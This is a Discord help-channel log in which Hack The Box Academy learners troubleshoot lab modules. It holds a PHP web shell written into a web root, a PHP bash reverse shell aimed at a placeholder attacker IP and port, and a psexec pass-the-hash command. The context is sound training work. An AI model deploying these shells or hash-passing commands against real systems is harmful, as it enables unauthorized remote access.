#modules
Got it, still my question is: if I have disabled ping using -Pn, why is it still sending ICMP packets?
It shouldn't be
But -A may enable things
It's why your disable flags go at the end
Hey there, I'm currently working on the Vuln Assessment module and I'm getting kinda confused on the methodology presented in the module.
It doesn't really make sense to me to evaluate the risks and anticipate the potential harm that our vuln scan could cause to the company's information system (step 6) AFTER performing the scan (step 5)
Am I missing something here?
Evaluate the risks of the discovered vulns
Just a small question related to the subscription: I'm planning to sub to the $8 student plan, so is it an auto-renewing subscription? Or can I do it manually each month if I want?
Auto
Nvm I'm just waking up, chuck in #1234357888114364508
ah F, is it possible to do it manually instead? I want to pay only until I want
just unsub right after subbing
^
Hmm ok
Monthly sub is for day x -> day x month to month so apr1 -> may1 or whatever day -> whatever day
But remember that once the subscription has expired, you will only be able to access the modules that have been completed completely.
are you saying an erratum already exists (because I can't find it), or should I make some kind of ticket?
Make a post there:
"Chuck it in" is an expression meaning throw or put it in
ok I thought it was a typo for "check in"
I did not mistype
U and e are very far apart
If I had mistyped, I'd just give up on life
Did not expect to learn English here
Hi all, working the footprinting assessment lab:
https://academy.hackthebox.com/module/112/section/1078
and running into this error:
NSOCK ERROR [4.4240s] mksock_bind_addr(): Bind to 0.0.0.0:631 failed (IOD #4495): Address already in use (98)
I've run into this a few times when doing BOXES and not academy, but I finally delved into this and it looks like I should be able to bypass this using --source-port <x>; but doing that, it's still returning :631 as in use... (I specified 13373)
is there a better way to fix this without killing whatever (cups) is on that port?
$ nmap -sV -sA 10.129.156.28 -g53 -Pn my nmap initially had nothing to do with that port anyway so I'm a little stumped... I did target that port on the TARGET (--top-ports=1000) but not sure why it's trying to do that on my host, particularly with -g specified
Look at the error message. Something is already running on this port.
yes I understand the error message but not how that relates to outbound scanning
A port can only be used by one service at a time.
yeah, uncertain why it's using :631 locally but putting that aside for a moment, I used the --source-port option to specify a diff port and I still came up with the exact same error
I'm doing a test on a target IP, not my local IP btw, in case that's unclear
but the default route 0.0.0.0 is specified and I'm uncertain whose IP that is tbh
I don't know what exactly you are trying to do, but the error message says that you tried to start a service on port 631, but it is already in use on your machine
(pwnbox or target)
I'm trying to do a simple --top-ports nmap scan -sV on a target
for the footprinting assessment
I guess I need to tcpdump an nmap scan and see if it's trying to use my local ports to connect to the target or something?
it has to be something local because I terminated the pwnbox, restarted it and the scan kicked right over
Which version of nmap do you use?
nmap 7.94, on pwnbox
Hmm? It should actually be solved.
https://stackoverflow.com/questions/73671565/nmap-running-on-zenmap-7-93-nsock-error-ssl-init-helper-openssl-legacy-provider
slightly diff error message but I'm past it for now, I'll just have to investigate the packets; it's possible it didn't like my CTRL+C interruption
thanks for that though, I'll keep it in mind
I just tried it on the PwnBox without any problems. Maybe you should restart the target and the PwnBox.
Getting Started Module > Knowledge Check > When I search for the exploit I don't find anything on searchsploit and other websites. Using MSFconsole and selecting what should be the right exploit, the check fails. Also, I see there is a manual way to do this, but the php code doesn't match anything we have learned. I feel like this makes it hard because I am by no means a web dev or a programmer. Even using swisskyrepo I wouldn't have gotten the reverse shell via php syntax right.
This is an entry level module, there's nothing overly complex you'll be required to do and you've been shown everything in the module so far
If the check fails: are you sure it's the right exploit
Right, but for me if I used the manual way to do the exploit, I only really know the website I've been provided and previous commands. The answer sheet uses something completely different. That's where I get hung up because without it I wouldn't complete this correctly (likely).
I just want to understand and learn what I'm actually doing is all :).
Then you take notes and research
Htb can't break everything down all the time. You may require external resources to understand things
The php syntax just uses system() to run a system command
So instead of using php, it runs system code
I have a OneNote pretty full of each module and have been reading on php, I just don't get how some of the commands are created for this. I do understand external resources are required here but half the battle is understanding what to look for when you are learning what it IS.
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
vs
||<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>||
$_REQUEST is specific to web stuff
typically it's either $_REQUEST[] or $_GET[]
it takes the arguments from the url ?somevar=someval
in this case it takes the "cmd" argument and runs the input from that as a system() command
literally just look at the docs for php
then google from there
/dev/tcp is a file descriptor of bash shell
In bash, /dev/tcp is a special file that allows you to establish network connections using the…
consider everything inside 'exec' as running as a shell
so it's running a revshell command within the php syntax
PWNIP/PWNPO is your tun0 IP and your listening port; I can see you pulled that from the walkthrough/guide
Is there an easy way to scroll up in a terminal to see items we can no longer look at (above)? I did end up with root flag after using msfconsole.
Hey, can I dm someone on Introduction to Sliver C2 module? Can't manage to establish reverse shell via forwarded port
Hi, has anyone completed the Prompt Injection Attacks module?
In the final Skills Assessment, I managed to get the CEO banned and even obtained the admin key, but the flag still isn't showing. Am I missing something or doing it incorrectly?
not the same problem and not sure if anyone already mentioned it, but the new update on Kali makes nmap return incomplete service versions
Anyone that completed the DACL attacks 2 module? I am stuck on the last question of the skills assessment.
Thank you this is definitely something I need to keep in mind
We're talking about nmap -sV outputs or just returning the wrong nmap version (-v or whatever?)
can anyone help with Password Attacks - PtT for Linux, the last 2 questions?
I got the ticket right but it still gives me errors, I can't access julio's smb share
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
it gives me this
even though I'm using the right ticket
klist
Ticket cache: FILE:/root/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:32:01 10/07/2022 21:32:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:32:01
⚠️ help
Hmm, could I get a hint for the DNS module of "footholding"? The last question ("Find FQDN of host with IP xxx.xxx.xxx.203") ... so I'm running dnsenum with various wordlists on the IP address of the initial DNS server (I do not know how to embed the information about the internal DNS server in this query). Any help?
With ligolo?
Nope, rportfwd, but nvm, resolved the issue
Is there any way to fix academy VPN constantly not working? I don't really know if that's my problem, but every like 3mins the IP of the server just keeps not responding and I can't do anything because of it.
I changed the server and the issue appears to be fixed
wasted days thinking I was the problem, the VPN is the fucking problem
fuck this shit man
If you're still stuck I'll be on the pc in a few. You can DM what you know and have tried.
can anyone help? where do I get the LINUX01$ Kerberos ticket from? I don't really understand the question
the module teaches you everything you need to know to find tickets
LINUX01$ would be the machine ticket that connects it to the AD environment
Hi guys! I'm doing the Getting Started module, I solved the first question and now I'm into user2 but whatever I do I can't find a way to escalate my privileges to access the flag.txt in /root; everything I try, I can't move because I don't have the user2 password. The only hint I have is "don't forget to chmod" but I don't understand exactly how I can use it in this case. Sorry for the possibly dumb question but I'm trying to learn as much as possible without googling solutions or using AIs
what can your user see that you think they shouldn't
sometimes a user may have more permissions to see something than they should
I can reach the flag.txt inside root but I can't open it due to permissions and I can't find a way to escalate privileges
the reading may have referred to a hidden file location such as where you'd store your id_rsa
every ssh user has one including root
just gotta list all items
Hey everyone! I'm stuck in Getting Started on Public Exploits. I viewed the hint and searched exploits in metasploit and found a read-only exploit that leads to an etc/passwd, but what am I supposed to do with the etc/passwd?
maybe modify the exploit to read a different FILE
options is useful
Ah I knew it! okay
Thank you!
I'm following the module's instructions but I just can't get to it, I'm almost cooked after several hours lol
can you explain a lil more
in order for a machine to connect to a domain, it needs to be issued a ticket
any machine tickets will have the $ at the end
so; you need to find the config for how it connects to the realm
hint a tool they showcase will be useful
thank you homie
I eventually got it, but thanks!
I did the chmod 600 part and now I have the private key id_rsa and the public key id_rsa.pub, and I'm stuck in the "ssh root@10.10.10.10 -i id_rsa" part where I keep getting timed out
That's the wrong IP
Yes I used the spawned one
so it either died or you have the pwnbox spawned at the same time being on the vpn or something. if your command is timing out that indicates you can't reach the target.
I tried several times with two different spawns and I always get the timeout. IP and port are correct, this section is making me crazy
are you on the vpn or using the pwnbox? it's something to do with your network connectivity. if you recently changed vpn servers you may need to hard refresh the page you are spawning the target on (CTRL+R)
I'm on VPN, ok I'll try one last time for today then I go to sleep lol thanks
I am experiencing a delay in the recursive ffuf scan process. I have double-checked the full URL from HTB academy on the browser, but it is showing "Server Not Found." Can someone help me with this?
your hostname is incorrect
I am connected through VPN and it is working when I run http://academy.htb:PORT
from my vmware
according to the text on the page you provided it's admin.academy.htb. in your command you're just using admin.academy. in discord you say you're using academy.htb. they are all different and according to the text, you need to use admin.academy.htb. make sure to add it to your /etc/hosts file too.
It's not a VPN problem, is there a way to have more than the -Don't forget to chmod-
"hint"? I give up for today but i honestly don't know where to start tomorrow, this is the first time i can't understand what to do...
It's a network problem of some kind. You said the error was a timeout. That means the command gave up because it couldn't reach the target before the timeout timeframe.
You can terminate the target, download a fresh VPN file, maybe from another server/region, hard refresh the site with CTRL+R, then re-spawn the target and try to connect again.
you should be able to ping the target too.
Yes but every other interaction with the spawnbox worked, that's the only command that didn't work. Anyway tomorrow is a new day, I'll try again, thank you very much
Hello all, I am stuck again on Getting Started on Public Exploits. I couldn't get shadow so I got config, but I am not sure what to do with the config. I tried logging in but it won't allow me because access is denied for localhost
Can any kind soul please DM me regarding help with Skills Assessment - File Upload Attacks
Any help would be appreciated
not sure what part you're trying to do; but the public exploits solely deals with a public facing web app; that tells you explicitly where the flag is
Or does anyone know why I am getting a 500 in response?
Quick question! Could I use my Education Email Address as my secondary email on my HTB account and still have access to Education pricing for the monthly subscription?
yes
Okay! Thank you
Hello guys, I have a question, I don't know if that's the right channel or what but the main question is:
How accurate is linpeas.sh?
I'm really new and I get linpeas red and yellow over a CVE, but when I try to check it, a module required for that vulnerability to be exploited is missing on the machine.
Does this happen or maybe I'm doing something wrong?
it's accurate to a point
but i don't recommend using it for n00bs
it throws a lot of info at you that ultimately is useless unless you really know how to exploit it
linpeas is like a car alarm that goes off when a leaf lands on the hood
Hey, I've put in a lot of time this past year into leveling up my pentesting skills. I've completed Offsec's PEN-100, and PEN-200 course. Along with Hack the Box Academy's Information Security Foundations course, both Bug Bounty Hunting and Penetration Testing job roles.
I'm currently hitting a wall. I feel like my note taking, enumeration, and understanding of fundamentals are solid. But when tackling labs or networks with multiple machines, I'm struggling to differentiate between the correct path forward, and rabbit holes.
A lot of times during enumeration, I'll find things that look like valid attack paths, sometimes even real vulnerabilities, but they turn out to be dead ends. When that happens, I end up brute forcing every interactive part of the site just to make sure I didn't overlook something. That approach eventually reveals the path forward, but it's inefficient and slow. My pace is nowhere near where it should be in recognizing where to focus my efforts.
I guess my question is, would someone be willing to tell me what I'm missing or what I should be focusing on to improve?
-sV, which involves the nmap version
just pointing this out because I was redoing some old exercises, and those using this version will have a problem finishing some modules
replace with an older version or tool, or only use parrot/htb instance
Hi guys, I'm preparing for CPTS and I am stuck in the Attacking Enterprise Networks web part, especially the cookie stealing on the support site. I can get requests to my php or python server if I just type the url to my server in the field that it needs to be in. But I cannot get a script to execute there. I already checked the solution tbh, bc I am stuck there for hours and can't figure it out at all. As a last resort I literally copied the solution and changed IP and port to my system's but it still doesn't work. Any help would be greatly appreciated.
I also restarted everything: VPN, lab, VM, host. I can't figure out if I overlooked something completely, the lab may be faulty, or I am just on it for too long
if you're struggling in AEN, then read the section, as the module itself is a guide
if you're struggling with that then you're likely doing something wrong
hard to say without knowing. but i'm an advocate of doing that module blind ==> not reading the module nor reading the questions
Hello everyone,
I'm completely new to IT, but I'd like to learn about cybersecurity. I have a vocational diploma in digital systems, so I'm already familiar with basic concepts and feel comfortable with computers in general. However, I have no experience in cybersecurity and don't really know where to start.
If anyone has a recommended learning path (courses, certifications, resources, hands-on projects, etc.), I'd love to hear your advice! My goal is to learn gradually and in a practical way.
Thanks in advance for your help!
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi guys, quick question. I have port 5621 open via nc and I'm trying to redirect a vulnerable SSRF part of a website to that port, however it's not giving the correct response, but when I do it on port 80, it does. Anyone have any ideas why?
@pine dune which module is that regarding?
SSRF
Provide a link to it, please
they show it in the example with port 8000
I'm trying to replicate it with port 5621 but idk if I'm doing something wrong
That's a tier 2 module, so please avoid posting screenshots with potential spoilers
sorry
You've asked your question, and specified the module, so hopefully someone will be open to giving you a nudge
okay thanks man
Thank u
So I am currently on the File Upload Attacks module doing the Absent Validation sub-module and I am having trouble understanding what I am doing wrong when writing the PHP script. I have tried a few different ways to output the hostname, but I don't get words, I get- nvm
LMAO I figured it out as I typed
Is there a channel I can suggest that a mistake was made on a certain question?
#1234357888114364508 <-
I don't know who created the assembly module on hack the box academy but that dude needs a raise.
Hello, so I am currently on the client-side Validation sub module in the file upload attacks module. I am attempting to modify the request as it states to create a shell on the host.
I have tried doing it as it shows a few times on the backend, but I just either get what looks like encrypted characters, or a black screen if I remove those characters from the initial request. Any help would be appreciated.
client-side section only requires you to modify the client-side validation side in the html from what i recall
Yes, where I change the file name and add in the php script in the actual request. When I try to then visit the file, rather than presenting a shell it presents a blank page.
I haven't tried the other way which is front end
May I show you the image in the module I am using as reference?
if the php code contains $_REQUEST["c"] => your call to the server must use ?c=
Ohh
$_REQUEST["param"] or $_GET["param"] require the "param" to be used in the request
yes
it has to exist somewhere in the request
Hi,
I have this small question regarding one command in Footprinting - DNS module.
I don't really understand the concept of using ns in a dig command as shown below:
dig ns inlanefreight.htb @10.129.14.128
What does it change to the output of a dig here?
Is it okay if I post an image from the module so I can clarify? From the way it seems to suggest, I change the file name in the request to theFileName.php and then a few lines down also write my script, and then send it, then try to visit it.
yes
that should be fine
module is above tier 0 so careful sharing :))
yeah when I visit it, it's just blank, or if I don't remove the random characters, those characters are in it.
it just being blank
^
that means it uploaded and you can visit it
given your php shell you need to call that endpoint with ?cmd=<command here>
the output depends on how the dns is set up, if it's authoritative or has special records
if you want it to run an arbitrary command you'd instead replace $_REQUEST["cmd"] with whatever system command you want
you're specifying the query type
dig <query> domain @nameserver
but can't we just use dig -x <ip>?
first time using the dig command so sorry if I'm totally wrong here haha
i'm sure there may be multiple ways to use dig
however the conventional format that dig uses is dig query do.main @name.server
oh okay, thanks for the clarification
NGL but the amount of information in CPTS modules is just enormous
so I retried using ?cmd=<and then a command> and each time I visit it, it's still blank. I am supposed to be able to, for instance, put ls after ?cmd= and it should spit out the contents of a directory, right?
oh ffs
you don't include the <>
Yeah I'm at a loss. haha
try using $_GET instead of $_REQUEST
Okay.
GET worked.
Best to understand the difference to see why it works better
Yeah I am looking into it. I wonder why the lesson says to use $_REQUEST
this module is a decent showcase of the example != what you'll encounter
Very true
I got a problem in Footprinting - SMTP module with the last question;
I found the username but it says it's incorrect...
[+] 10.129.54.51:25 - 10.129.54.51:25 Users found: *****
I used metasploit to get it
question:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
is it some task bug or?
Try using other tools like the nmap script or a third party script
trying it rn; "Remember that some SMTP servers have higher response times", now I know what they meant here... Sooooo slow
but I'm wondering why MS doesn't work here
also make sure you're using the wordlist from the resources
yea, I'm using it
@waxen totem found it...
gonna write down this command for future; sometimes I love that Academy doesn't give all commands straight up, forcing us to research it ourselves and LEARN but sometimes it makes me maaaad haha
btw MS works too but I had to change the wordlist to the one provided in resources (and it's kinda faster than the command I used)
Hi, can anyone give me a hint on the File Upload Assessment.
I already have the extension and content type and found the directory from xxe attack to get from source code.
When uploading the final shell code it still says "Only images allowed" and I changed everything in repeater, even added magic bytes (GIF8)
I did also see in forums someone using a hex editor and that as well did not work
you can try adding a double extension but I may be wrong (haven't done this task yet)
I did that as well
I checked (fuzzed) for both black- and whitelisted as well for content type filters.
if it says "Only images allowed" then it's most likely that ur file has to have the image extension, but I don't want to give the wrong idea cuz like I said I haven't done that task yet
but keep researching, you'll find something useful in no time!
I have been all day lol
earlier I couldn't find the source code but I took a break and I found it doing the same method, idk how, now it worked.
but now I can't get past this issue.
As for the hex editor, I used a JPEG signature, but I guess the PHP code that follows immediately after, the system may detect it as suspicious. But I am not sure if this is even the issue.
have you tried using a real image
I just used exiftool
on repeater it gives me a response and does not say "only images allowed" but when I go to the file it says only images are allowed again.
I need to scan my system for all listening services across all interfaces, I'm having trouble and chatgpt can't save me
which module and section?
Hey
I have never used hack the box
Can anyone tell me if THM and HTB are same or different??
I got it to work but now stuck on parameter commands. I tried ?cmd= cat ../../../../flag.txt as well as cat flag.txt. Also cd ../../../../;ls -la but didn't see anything interesting
Any tips/hints?
this is still for Skills Assessment - File Upload Attacks
is Skills Assessment - File Upload Attacks broken? I can upload a .svg file with the XXE payload for upload.php but it won't show anything in the source code
Dm what payload you used bc it was like that for me too
will do, ty
oop sry, I didn't receive a ping, it's Linux Fundamentals (18) sec 80
sysctl or netstat?
sysctl is responsible for the services on the machine
netstat is used to get the network status, usually ports and interfaces on the machine
which one do you think you should use? ๐
also provide the section name not just the number
ik netstat, but I've tried everything, to the point that I'm questioning myself
it's section "Filter Contents"
look at what's specified in (the parenthesis) after the question
yh, ss -tuln | grep -c 'LISTEN' is responding 20, I thought -tuln would respond with all interfaces
yes but how many of those are localhost?
it wants the ones that AREN'T localhost
ohh
~~ngl could've been worded better~~
Hey guys! I just want to confirm one thing. I'm doing the web attack module and for the remote code execution with XXE exercise I'm supposed to launch a python web server on my VM. I just want to confirm: is it safe to do so? Can a malicious actor connect to my VM or home network if I do "sudo python3 -m http.server 80"? Are there any risks or is it totally safe?
Read what's in the parenthesis again...
okkk
no one can connect to your home network without being in range and having the wifi password for it
it's safe (unless you've done some port-forwarding on your router and have very specific configs for your VM network)
Okay, thanks guys! That is good to know. I was worried port 80 would open up for everyone on the internet and everyone and their mom would try to connect to my IP through port 80.
Be glad we ran out of ips early on and they had to invent NAT
massive security boost ngl
what abt with remote management?
One more small question
If say, I pay my $8 and then unsub, will my subscription be valid for that month?
For the htb academy student plan
for most services yes, check tos when u agree. chatgpt is handy
same thing, VPN is the exception
I want to explore and see first if I'm comfortable with the content then I'll continue with the sub
still can't connect to your home network bruh
And if I can handle ctps I could go ahead with that then
contact support for all things related to subscriptions
Need to speak to a person? Learn how to reach our support via HTB Labs.
ok
"Need to speak to a person?" ai is too powerful
AI isn't very smart
considering it couldn't find what I was doing wrong earlier, I agree
https://help.hackthebox.com/en/articles/5720974-academy-subscriptions
I wonder if this article is still valid
Scrolling down, you can see your current plan. At the end of the page, you can simply click the Cancel Subscription option, which will keep your current month's or year's subscription active and running, but will prevent further automatic payments from going out from your default registered payment method.
yh so it should cancel after free trial,
otherwise you can always tell your card not to give em money
academy doesn't have any free trials... does it?
~~and don't say T0 modules are free trials, they aren't~~
ok, and if I cancel the sub then it should be valid for the next 30 days right?
contact support for anything related to subscriptions
ok
isn't it "don't spoil over t0"?
yeah don't spoil anything over t0 cos they ain't free, also regardless of tier don't share answers either.
kk can i dm u?
what for?
future problems, no I will not always be available (ask when they happen, I'll help if I'm active), right now, I wanna know the context
same question, however I didn't know if I could post possible answers here?
you can post command results without the answers in it
ah F support is closed till tomorrow
I want to know if someone tried to cancel the subscription right after paying
Why couldn't you? You've paid for the whole month, yeah? Also, if you want to be sure. Why don't you just cancel the subscription a day before the month has passed?
oh right I can also do that
Hello, can someone help me? I'm in the WordPress skills assessment on hackthebox academy, I can't launch a wpscan?
do you have it installed?
Yes I have, I also got this error "Scan Aborted: The remote website is up, but does not seem to be running WordPress."
And I can't access the https servers, I have this error "SSL_ERROR_RX_RECORD_TOO_LONG"
nice, decided to enroll in the student plan, will complete the pen tester path first
decided to let it go on for 3 odd months then unsub
could my error have been that I was given duplicate ports? I got annoyed and guessed the answer, however I just realised I got some duplicate ports when not using | wc -l to auto count for me
Well, the module also introduces how to deal with that
Hey guys, super stuck on AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host. I've obtained the C*** user's PW and GenericAll rights. But cannot abuse the ACL / Admin hash obtained from SQL01 doesn't work with MS01. Would much appreciate some help
Feel free to DM me. It has been a while since I did that but still have my notes so I'll be able to provide some help :)
awesome thank you!
Hello. I'm having trouble with the new android fundamentals module. Section android emulators, question Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? I have created the correct AVD but it seems like the build number is incorrect.
Hey all, I would like to ask
for AD Trust Attacks Module
Lesson (Unconstrained Delegation)
Currently I am attempting to spin up the box. However every time I authenticate I receive the error 'ERRCONNECTLOGON_FAILURE
If anyone has ever done this module and would love to point me in the right direction, it would be greatly appreciated
Disregard this issue, it seems like it was VPN related. I changed VPN and it sorta worked
Nvm I solved it
Lmao
sorry, not related to modules, more to the AttackBox VM, not sure if it's the right place to ask, but does anyone have this issue? I don't have any active AttackBox VM at the moment
Hi,
I'm currently doing the module "Applications of AI in InfoSec"
For the Network Anomaly Detection, when I'm submitting the model file for evaluation, I got the error "Invalid model file"
I validated the upload code by uploading the spam classifier (to the right port), and it works
I also tried to load the Network anomaly model and use it, it also works, so the joblib.dump() seems ok
Did I miss something?
How do I fix this output in a windows shell
Hello
Need some help? Learn how to reach the support team on Academy.
@limber wedge ^
that's just kinda normally how weirdly it outputs
In the Linux Local Privilege Escalation - Skills Assessment module there is a note that says:
Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. This is optional and does not award more points or count towards completion.
Is there someone who figured out how to get a foothold without using SSH?
yes contacted support, i guess ill wait for them, thank you !
Hi guys, I'm doing the pentest introduction course, I'm on the Nibbles machine and I'm following instructions but when I try to execute the whatweb <ip/nibbleblog> I get the ReadTimeout error. I googled and there's another guy that had the same problem and he supposed that it was due to Nibbles being part of the VIP subscription, is this the reason? It's not a problem on my side
If I execute whatweb with the IP only it works, the problem is when I try to access /nibbleblog, and I can't reach it in the browser either
@fathom pendant you never sleep, right? hahah
the nibbles section on getting started module is slightly different than the box but not being able to access the endpoint is odd (it has nothing to do with subscription level)
try changing vpn regions/respawning target
I also tried to click directly on the link from the redirectLocation of the whatweb scan, so the URL should be correct. I'll try your suggestion and let you know, thank you!
It's weird because the initial page where there's the Hello World string works
on the logrotate part of linux privesc, why is the log not rotating?
It's in the Footprinting - SNMP module, last question.
that's not how snmpwalk works
I used snmpwalk to find the script
then I thought I can use snmpget to get the content of it
lol also: you are grepping and it is returning what you're grepping. Maybe you need more context after the grep.
grep is a powerful tool if you just read the docs
update the log file and it'll rotate
Consider each .n its own output line getting more specific, i.e. 1.3.6.0.1 and 1.3.6.0.2 refer to the same 1.3.6.0 object but more specific at .1 and .2.
I did, and then it created a new file. I thought it was supposed to give me a shell.
Oh lol nvm, immediately after sending that I got root. Then the shell went away before I could cat the flag.
i would focus on trying to grab the file instead, shells with this method are highly unstable
DAMN, I love you!!!
thanks A LOT!!!
I got the flag, thank you! I don't remember reading anything about how to update the log in the section.
reading up on OIDs is useful for snmp stuff
Who here likes powershell ?
who doesn't LOL
I hate learning PowerShell, but oh boy do I like what you can do with it.
So I am on Password Attacks Lab - Hard. I was able to get the hashes from the VHD file, but none of the wordlists I have tried so far cracked the Administrator hash. Can I get a hint in the right direction please?
rockyou or mutated should work
$ john hashes_to_crack.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt found nothing
if not: you don't need a password to log into windows, sometimes the hash is all you need
If you need to use a mutated password, I'm pretty sure the 64 top rules in hashcat are a good one for mutating pw lists for HTB.
reverse psychology
Never actually tried using the hash as the password, but when I think about it, it does make sense.
Yeah it's weird, I was doing a box once and I was stumped after not being able to crack the hash. Eventually I looked up the next step in the walkthrough and was so annoyed that I just had to use the hash.
I changed my payload, it fixed that issue
Do you by chance remember the box name?
Yep, most tools support it; freerdp uses /H: I think.
But there is no practical use with it, right? I mean, like IRL who would keep their NTLM hash itself as their password?
Uhhhhh, idk. I remember one of the more recent Active Directory ones I did was Cicada, but idk for sure if that was it.
you're thinking incorrectly about this
with Windows: the hash is the same as the password, essentially
Yeah, I too had a bad feeling about that.
it's not that their password is the hash, it's just the way the login works
oh wait
the hash is just a hashed version of the pw
You mean if I put the hash it is treated as a password itself in Windows?
Like rather than password123, if I input the hash of it, Windows treats it the same way? @fathom pendant
I havent really touched windows machines yet, been mostly working on Linux.
Ok so I tried to use the CMD as Administrator and tried the hash as the passwd; that didn't work. So we must have to import psexec on the box to get this to work or something.
So I'm doing the misc Linux priv esc and I ended up getting root with the NFS, but I can't find the flag. I found 4 flags on the system and none are the right ones.
not necessarily, it's just how it's shipped off
You should check the /etc/exports file
you don't use /p: to pass the hash
thank you
an ntlm hash is in the format LM:NT, typically the NT portion is used
for UAC, you'd need the pw
but you can just... log in as the admin directly
instead of dealing with UAC/importing tools
shipped off? you mean how windows handles authentication? like, when I enter a password (password123) does windows immediately compare it to the stored hash or does it first hash my input and then check if it matches the stored hash?
when you input the password it's hashed and compared
basically how any password authentication should work is that the password itself isn't stored, rather the hash
Oh ok, got it, so if I have the NT hash I can log in as admin without worrying about the UAC restrictions.
Is this a common practice while doing CTFs or real-life pentesting?
ohhhh
wow
SUPER common lol
But thanks a lot for the valuable info you guys shared.
I learned a lot because of this convo.
it's passed off differently with PTH techniques
basically the way the PTH code works is it skips the password hashing part and says "hey look at this and compare"
oh so which is the safer method?
you don't use PTH for standard login
got it
not sure what you mean "safer"
you use your password all the time to log in
an attacker would use the hash because the authentication mechanism allows for it
python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes :whwhwhwhwhhw Administrator@10.129.61.157
I have tried this as well as xfreerdp, also from a runas Administrator cmd. I just don't get it.
ok understood,
"Safer" was in terms of: as PTH bypasses the usual password hashing, was it inherently less secure?
but i understand now
It doesn't make it less secure.
thanks
You sure the NT part is correct?
And while searching on Google, I found psexec needs SMB enabled.
maybe try wmiexec
Have you passed the hash with cme? May have the wrong hash or trying it against the wrong host
or try using evil winrm
I need help with MSSQL attacks, I need resources. What happened in the Attacking Common Services hard lab is abusing
Your daily take care message
Hello everyone I hope you have an amazing day today staying safe, drinking water, staying hydrated, eat a snack, take a shower n take your meds if you need to.
And remember that someone is happy that you exist and I'm so proud of you all. Stay amazing y'all, take breaks when needed and take care of yourself first. Love y'all and stay awesome
Hi, I'm doing the backup and restore page within linux fundamentals and it is asking me for the htb user password, what is this for default?
Okay nevermind, I changed the command because I am just copying files to a backup on the same system just to test the command. I am still curious as to the default password for the htb user for future use?
I realized it was a whole technique like the impersonating thing, but with mssql right?
Hello, I'm trying to use kerbrute to get some valid users.
But kerbrute gets stuck when using jsmith.txt.
But it is doing well when using a small list.
How can I resolve this?
And why does it happen?
Hello, I am having an issue with a module. I wanted to check here first before I hit up support. Is anyone available?
ask your question, someone here might be able to help
Thank you! On the AS-REPRoasting challenge questions (Kerberos Attacks) it says to log in with a specific user and pass. Each time I try to log in it gives me a bad user/pass. I've tried with the local and domain user once I go to the login screen. Just curious if I am missing something here.
Never mind. After the 3rd reset it finally worked
I just tested this and it worked for me. Are you sure you're connecting to the right target? Try with xfreerdp3 or something.
Yes, I was connected to the right target. Not sure what happened. I even changed VPNs, but it worked after the 3rd reset. Thanks a bunch for trying as well. I appreciate it.
?
What do you mean? What you need to do is in the Attacking SQL Databases section from Attacking Common Services, right?
the mssql attack in attack common service hard lab
Yeah what is the problem?
I wanted to know the technique exactly. In the conclusion, what are you trying to do? It was impersonating users via MSSQL, right?
Yes
Yeah the sqlcmd program is a bit goofy
The SPN Jacking module had problems getting the NTLM hash of the user in the context of which I should abuse access in the last task. I used different techniques, but the module clearly gave a hint that I should use the Shadow Credentials technique. I used the Whisker tool from Linux and Windows, but I get the same problem [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP.
https://academy.hackthebox.com/module/112/section/1079
I'm getting a permission denied error when trying to cd into the identified mount location from enumeration... it mounted successfully but I can't access it... is this not the way forward?
You don't need to use shadow credentials for SPN jacking part of DACL 2... you can do what's in the section
im going back over my notes and the associated module but not seeing anything in particular
can i write to you in dm?
sure
Did you go in as root?
Like, uh, sudo mount? If so, then yes.
Cd
I tried sudo cd and it gave me some error I didn't note at the time. Let me try it again.
I also mounted it in ~/nfs.
Should I have mounted it in /mnt/nfs or similar?
Yes, funnily enough sudo ls ~/nfs is showing files.
Let me try the cd again, it's possible I... misspelled it?
Unlikely, but let's see.
switch to root
Is that gonna be sudo -l in this instance?
Er, sudo -i? Or whatever it is?
Or su root?
I never know when to use what.
su root, sudo su
oh gosh
So what's going on here? Are nobody and nogroup actual users/groups and that's causing the conflict?
I thought those were globs for whatever, for anonymous?
I think it has something to do with root squash but not 100% sure
thanks that was lost on me
Last night I completed Starting Point. This morning I spun up OpenVPN, got "Initialization Sequence Completed" and I cannot ping the server, I get request timeout. I tried Pwnbox and I'm getting the same thing. I've tried restarting my computer. I've tried using both my wifi and tethering to my phone. I'm not sure what else I should be checking here.
Did you start the target?
Please forgive the question. Are you trying to ping a Windows host?
I've tried 3 different targets now.
Looks like I can't upload screenshots here.
https://app.hackthebox.com/machines/Cap
Displays Target IP Address 10.10.10.245
OpenVPN displays Initialization Sequence Completed
and pinging gives
```
ping 10.10.10.245
PING 10.10.10.245 (10.10.10.245): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
^C
```
Is that a starting point machine?
Starting point and the other machines have different vpns
I feel like I'm experiencing multiple issues.
I clicked on the Machines tab on the left sidebar and chose the UnderPass challenge. I also got VPN credentials for Machines from the top right corner and I started UnderPass and I'm still getting timeouts.
Whelp now at least I can connect via the Virtual Machine. Still can't get OpenVPN to work.
On your VM what's your NIC set to?
Some combination of things, including sudo killall openvpn, caused it to work.
Bridged, Auto, etc? Not sure which platform you are using
ok, my bad. I had that issue once with Fusion
That was a fun learning opportunity. Yall are awesome, thanks for all the help.
Your answer answers the question "How would you text align an H1 element"
To match the format of the question, I'm guessing the answer is text-align: left
The format was there in the question.
Read and follow #welcome to upload images here
Hmm I did that last night but I guess I did it wrong.
Hello @acoustic owl Where do I get help from HTB staff regarding HTB academy modules question. Im stuck at this one for hours
If you have an annual subscription, you have access to the complete solution. Otherwise there is no help from the staff.
